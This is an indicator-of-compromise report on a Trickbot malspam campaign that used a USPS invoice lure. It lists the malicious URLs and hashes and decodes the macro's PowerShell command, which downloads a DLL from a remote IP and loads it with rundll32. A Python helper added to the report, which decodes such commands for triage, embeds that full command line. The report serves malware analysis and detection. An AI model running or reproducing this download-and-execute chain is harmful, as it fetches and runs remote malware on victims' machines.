2021-10-20 Trickbot IOCs
THREAT ATTRIBUTION: TRICKBOT
SUBJECTS OBSERVED
USPS Invoice
SENDERS OBSERVED
MALDOC DOWNLOAD URLS
https://uniga.ac.id/wptracking/tracking2/tracking/tracking.php
MALDOC FILE HASHES
USPS_invoice_EA19788988US.xlsm
83b9a16d756ce3c82311412f0db65e4b (MD5)
POWERSHELL COMMANDS FROM MALDOC
cmd.exe [2640]
"C:\Windows\System32\cmd.exe" /c start /B /WAIT powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADkANAAuADEANAAwAC4AMQAxADIALgAxADUALwBpAG0AYQBnAGUAcwAvAHkAZQBsAGwAbwB3AGIAaQBrAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,DorntErl
The -enc argument is base64 of UTF-16LE text and decodes to:
Invoke-WebRequest -Uri "http://94.140.112.15/images/yellowbike.png" -OutFile "C:\ProgramData\clb.dll"
The second half of the command line (after the &) then runs rundll32.exe against the downloaded file, calling the export DorntErl of C:\ProgramData\clb.dll. The .png extension on the server side is cosmetic; the response body is written to disk unchanged and loaded as a DLL.
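Added example (not part of the original IOC list): a small Python triage helper that takes a logged process command line like the one above, finds the -EncodedCommand argument (powershell.exe accepts -e, -ec, -enc and any unambiguous prefix), decodes it as UTF-16LE base64, and pulls out the download URL, the -OutFile path and the rundll32 DLL/export pair. The sample command line is the one recorded above; the function and field names are this example's own choices.

```python
"""Decode a PowerShell -EncodedCommand and extract download/execution IOCs.

Added example; not code from the IOC list or its author. The command line
below is the cmd.exe -> powershell -enc -> rundll32 chain recorded above.
"""
import base64
import re
from typing import Optional

# The cmd.exe command line from the IOC list (copied verbatim, split for width).
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /c start /B /WAIT powershell -enc '
    "IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAv"
    "ADkANAAuADEANAAwAC4AMQAxADIALgAxADUALwBpAG0AYQBnAGUAcwAvAHkAZQBsAGwAbwB3AGIAaQBrAGUA"
    "LgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABj"
    "AGwAYgAuAGQAbABsACIA"
    r" & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,DorntErl"
)

# "-e<anything>" followed by a base64 blob; the flag is validated in code so that
# -ExecutionPolicy Bypass and similar are not mistaken for an encoded command.
_ENC_FLAG_RE = re.compile(r"(?i)(?<![\w-])-(e[a-z]*)\s+([A-Za-z0-9+/]+={0,2})")
_URL_RE = re.compile(r"(?i)\bhttps?://[^\s\"'<>]+")
_OUTFILE_RE = re.compile(r"(?i)-OutFile\s+\"?([^\"\s]+)\"?")
_RUNDLL32_RE = re.compile(r"(?i)rundll32(?:\.exe)?\s+\"?([^\",\s]+)\"?\s*,\s*([\w@#]+)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of the first -EncodedCommand argument, or None.

    PowerShell requires the argument to be base64 of UTF-16LE text, so anything
    that is not valid base64 or not even-length UTF-16 is skipped.
    """
    for m in _ENC_FLAG_RE.finditer(cmdline):
        flag, b64 = m.group(1).lower(), m.group(2)
        # -ec is a documented alias; otherwise the flag must be a prefix of EncodedCommand.
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue
        try:
            return base64.b64decode(b64, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def extract_iocs(cmdline: str) -> dict:
    """Decode the command line and collect URLs, dropped file and rundll32 target."""
    decoded = decode_encoded_command(cmdline) or ""
    outfile = _OUTFILE_RE.search(decoded)
    rundll = _RUNDLL32_RE.search(cmdline)
    iocs = {
        "decoded_command": decoded.strip() or None,
        # URLs may sit in the clear part of the command line or inside the decoded script.
        "urls": sorted(set(_URL_RE.findall(cmdline + "\n" + decoded))),
        "outfile": outfile.group(1) if outfile else None,
        "rundll32_dll": rundll.group(1) if rundll else None,
        "rundll32_export": rundll.group(2) if rundll else None,
    }
    # The tell-tale pattern in this chain: the path PowerShell writes to is the
    # path rundll32 is then told to load.
    iocs["download_then_load"] = bool(
        iocs["outfile"]
        and iocs["rundll32_dll"]
        and iocs["outfile"].lower() == iocs["rundll32_dll"].lower()
    )
    return iocs


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

Run against the sample it reports the yellowbike.png URL, C:\ProgramData\clb.dll as both the -OutFile target and the rundll32 argument, the export DorntErl, and download_then_load as True. The same function is a reasonable first pass over any process-creation log that records full command lines (Sysmon event 1, EDR telemetry), since the decoding rule is fixed by powershell.exe rather than by the malware.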
TRICKBOT PAYLOAD DOWNLOAD URL
http://94.140.112.15/images/yellowbike.png
TRICKBOT PAYLOAD FILE HASHES
Not collected: the payload URL was already down at the time of analysis.
TRICKBOT GTAG
gtag: Unknown
TRICKBOT C2s
No C2 traffic was observed.
SUPPORTING EVIDENCE
https://urlhaus.abuse.ch/url/1698134/
https://www.virustotal.com/gui/file/7c71832b07e2b4b3fcd36b6cb7b129a325974feab411369cb7674425dcb144ed